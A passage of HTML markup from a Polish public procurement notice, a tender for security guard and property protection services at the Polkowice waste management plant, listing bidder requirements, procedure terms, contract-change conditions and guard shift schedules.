SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)	ważnej koncesji wydanej przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej zgodnie z ustawą z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz.U. z 2016 roku poz. 1432)b)	wykazu dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;c)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika. 2. W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez Wykonawców chcących startować wspólnie wspólnego pełnomocnika. 3. Zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, w sytuacji określonej w art. 22a ustawy.4. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Oświadczenie Wykonawca składa w formie oryginału lub kopii poświadczonej za zgodność z oryginałem. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, oddzielnie składa ww. dokument.UWAGA: W przypadku wpłynięcia tylko jednej oferty w ramach niniejszego postępowania złożenie ww. oświadczenia nie jest wymagane.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena jednostkowa brutto ( 1 rg )</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Wzór umowy został zamieszczony w ROZDZIALE C niniejszej specyfikacji i stanowi jej integralna część.Warunki i zasady wprowadzenia istotnych zmian do zawartej umowy:1. Dopuszcza się zmianę przedstawicieli stron z przyczyn niezależnych od stron (siły wyższe*, zdarzenia losowe, itp.). Strony zgodnie ustalają, że zmiana przedstawicieli będzie poprzez pisemne poinformowanie stron o zaistnieniu tego faktu.2. Dopuszcza się zmianę zapisów umownych stanowiących oczywistą omyłkę.3. Zamawiający dopuszcza możliwość zmiany zakresu rzeczowego dokonanego przez Zamawiającego, w trakcie realizacji prac lub z przyczyn niezależnych od Wykonawcy (sił wyższych*),4. W przypadku zaistnienia okoliczności wskazanych w ust. 3, Zamawiający dopuszcza możliwość zmiany wynagrodzenia umownego brutto wskazanego w § 4 umowy, poprzez wprowadzenie do obowiązującej treści umowy wartości rozliczenia , w następujący sposób:a)przygotowanie przez Wykonawcę kalkulacji dla wykonanego zakresu podstawowego zamówienia z uwzględnieniem zmian wprowadzonych wskutek okoliczności wskazanych w umowie, b)sprawdzenie i zaakceptowanie w/w kalkulacji przez zamawiającego,c)spisanie pomiędzy stronami stosownego aneksu finansowego do umowy lub zawarcie umowy na podstawie zamówienia w trybie zamówienia z wolnej ręki.5. Zamawiający przewiduje możliwość skrócenia terminu obowiązywania niniejszej umowy. W takim przypadku wartość wskazana w § 4 ust. 2 umowy zostanie zmniejszona. Wykonawcy nie przysługuje z tego tytułu roszczenie odszkodowawcze lub też roszczenie wypłacenia pozostałej kwoty do wartości wskazanej w § 4 ust. 2 umowy.*siła wyższa - wydarzenie lub okoliczność o charakterze nadzwyczajnym, na którą Wykonawca ani Zamawiający nie mają wpływu; wystąpieniu której Wykonawca ani Zamawiający, działając racjonalnie, nie mogli zapobiec przed zawarciem Umowy; której, w przypadku jej wystąpienia, Wykonawca ani Zamawiający, działając racjonalnie, nie mogli uniknąć lub jej przezwyciężyć; oraz która nie może być zasadniczo przypisana Wykonawcy ani Zamawiającemu.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-12-14</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dozór i ochrona mienia na terenie Zakładu Gospodarki Odpadami, ul. Działkowa 20, Polkowice</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Specyfikacja do zadania nr 1: Dozór i ochrona mienia na terenie obiektu: I.	Wymagania dotyczące dozoru i ochrony mienia na terenie Zakładu Gospodarki Odpadami, ul. Działkowa 20, Polkowice.1.	Bezwzględne przestrzeganie zakazu przebywania na terenie składowiska osób postronnych (szczególnie osób zajmujących się nielegalnym odzyskiem surowców wtórnych).2.	Po zamknięciu ZGO bezwzględne przestrzeganie zakazu wjazdów pojazdów i przebywania osób postronnych (wyjątek - wyraźna instrukcja Kierownika Zakładu Gospodarki Odpadami, Prezesa Zarządu) lub upoważnienie.3.	Niezwłoczne powiadomienie Kierownika Zakładu Gospodarki Odpadami o każdorazowym wejściu na teren Zakładu organów kontrolujących np. WIOŚ, GIOŚ, Policja, Urząd Marszałkowski.4.	Stałe obchody:- strzeżonych urządzeń- pomieszczeń - obiektu.5.	Kontrola zabezpieczeń i zamknięć wejść (bramy i drzwi) oraz okien.6.	Pracownicy ochrony są zobowiązani znać miejsce rozmieszczenia przyrządów alarmowych, sprzętu gaśniczego, miejsce włączenia/wyłączenia oświetlenia terenu oraz instrukcje p. poż ZGO. 7.	Sprawdzanie działania urządzeń sygnalizacyjnych, punktów świetlnych i urządzeń przeciwpożarowych.8.	Załączanie i wyłączanie oświetlenia zewnętrznego.9.	Szczególny nadzór nad stanem pożarowym obiektu. Przestrzeganie bezwzględnego zakazu palenia ognisk. Likwidowanie wszelkich prób palenia ognisk. Natychmiastowe alarmowanie Straży pożarnej, Kierownika Składowiska, Kierownika Zakładu Gospodarki Odpadami o zarzewiu ognia.10.	Zapobieganie wynoszenia i wywożenia odzyskanych odpadów.11.	Zatrzymywanie osób dokonujących kradzieży, dewastujących mienie lub znajdujących się pod wpływem alkoholu wraz z bezzwłocznym powiadomieniem policji oraz wskazanego pracownika Zamawiającego.12.	Zapobieganie wnoszenia na teren ZGO odpadów nie ewidencjonowanych.13.	W szczególnych warunkach (silne mrozy), nie dopuszczenie do zamarznięcia platformy wagi (posypywanie środkami otrzymanymi od Zamawiającego).14.	Pracownicy ochrony powinni być zaopatrzeni w odpowiedni strój oraz środki techniczne.15.	Zakaz uruchamiania pojazdów i urządzeń (z wyjątkiem sytuacji zagrażających życiu lub mieniu).16.	Prowadzenie codziennych raportów z opisem dyżurów.17.	Zamawiający umożliwia korzystanie z monitoringu na terenie ZGO.18.	Zamawiający zastrzega sobie możliwość kontroli przez Wykonawcę pracowników alkomatem oraz kontrolę plecaków, samochodów.19.	W przypadku stwierdzenia niezgodności z zakresem przedmiotu zamówienia będzie tworzony protokół niezgodności.20.	Przedstawienie przez Wykonawcę wykazu pracowników obsługujących obiekt.21.	Wykonawca na etapie przedstawiania ofert powinien dokonać wizji lokalnej na obiekcie celem zapoznania się z istniejącymi warunkami oraz terenem.22.	W ramach usługi Wykonawca wyposaży osoby dozorujące w urządzenia systemu kontroli obchodów, dzięki którym możliwa będzie pełna kontrola nad wykonywanymi obchodami, tj. dokonywanie obchodów wewnątrz i na zewnątrz dozorowanych obiektów w celu sprawdzenia zabezpieczeń (zamknięcia pomieszczeń, okien, wyłączenie oświetlenia i urządzeń elektrycznych). Ponadto Wykonawca będzie przedstawiał Zamawiającemu raport tygodniowy z dokonywanych obchodów.23.	Stała współpraca z Zamawiającym w zakresie utrzymania ładu i porządku na terenie obiektu i w jego otoczeniu.24.	Wykonawca musi posiadać własny oddział prewencji (grupę interwencyjną) składający się z co najmniej 2 osób poruszający się samochodem i mogący zareagować na terenie chronionych obiektów w czasie do 15 minut od telefonicznego wezwania działający 24h na dobę.25.	Wykonawca odpowiada wobec Zamawiającego za wszelkie szkody wyrządzone i powstałe w związku z nienależytym wykonywaniem przedmiotu umowy przez pracowników ochrony oraz osoby trzecie.Forma rozliczenia:a) Należność za wykonaną usługę, przysługującą Wykonawcy za każdy miesiąc będzie iloczynem liczby roboczogodzin przepracowanych w danym miesiącu i stawki za 1 roboczogodzinę.b) Cenę do przetargu należy podać za 1 roboczogodzinę.Wielkość obsady:a) 2 osoby,b) grupa interwencyjna (24 h/dobę, czas dojazdu od momentu zgłoszenia 15 min.).Godziny wykonywania usługi dla pracownika ochraniającego ZGO:1)	W dni robocze:a)	Poniedziałek - od godz. 21.00 do godz. 6.00 dnia następnego,b)	Wtorek - od godz. 21.00 do godz. 6.00 dnia następnego,c)	Środa - od godz. 21.00 do godz. 6.00 dnia następnego,d)	Czwartek - od godz. 21.00 do godz. 6.00 dnia następnego,e)	Piątek - od godz. 21.00 do godz. 7.00 dnia następnego.2)	Sobota - od godz. 15.00 do godz. 6.00 dnia następnego.3)	Niedziela - od godz. 6.00 do godz. 6.00 dnia następnego.4)	Święta - od godz. 6.00 do godz. 6.00 dnia następnego.Godziny wykonywania usługi dla pracownika ochraniającego Składowisko:1)	W dni robocze:a)	Poniedziałek - od godz. 19.00 do godz. 7.00 dnia następnego,b)	Wtorek - od godz. 19.00 do godz. 7.00 dnia następnego,c)	Środa - od godz. 19.00 do godz. 7.00 dnia następnego,d)	Czwartek - od godz. 19.00 do godz. 7.00 dnia następnego,e)	Piątek - od godz. 19.00 do godz. 7.00 dnia następnego.2)	Sobota - od godz. 15.00 do godz. 7.00 dnia następnego.3)	Niedziela - od godz. 7.00 do godz. 7.00 dnia następnego.4)	Święta - od godz. 7.00 do godz. 7.00 dnia następnego.Miejsce wykonywania usługi: Zakład Gospodarki Odpadami, ul. Działkowa 20 ok. 4 km od Polkowic) Termin wykonywania usługi ZGO.: od dnia przekazania obiektu (termin zostanie wcześniej ustalony przez strony telefonicznie) do 02.01.2020 r. do godziny 11.00W szczególności ochronie będą podlegać:- środki trwałe, wyposażenie, dokumentacja- maszyny, garaże, hale, kontenery socjalno-bytowe<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>79710000-4, <br/><br/><b> 3) Wartość części 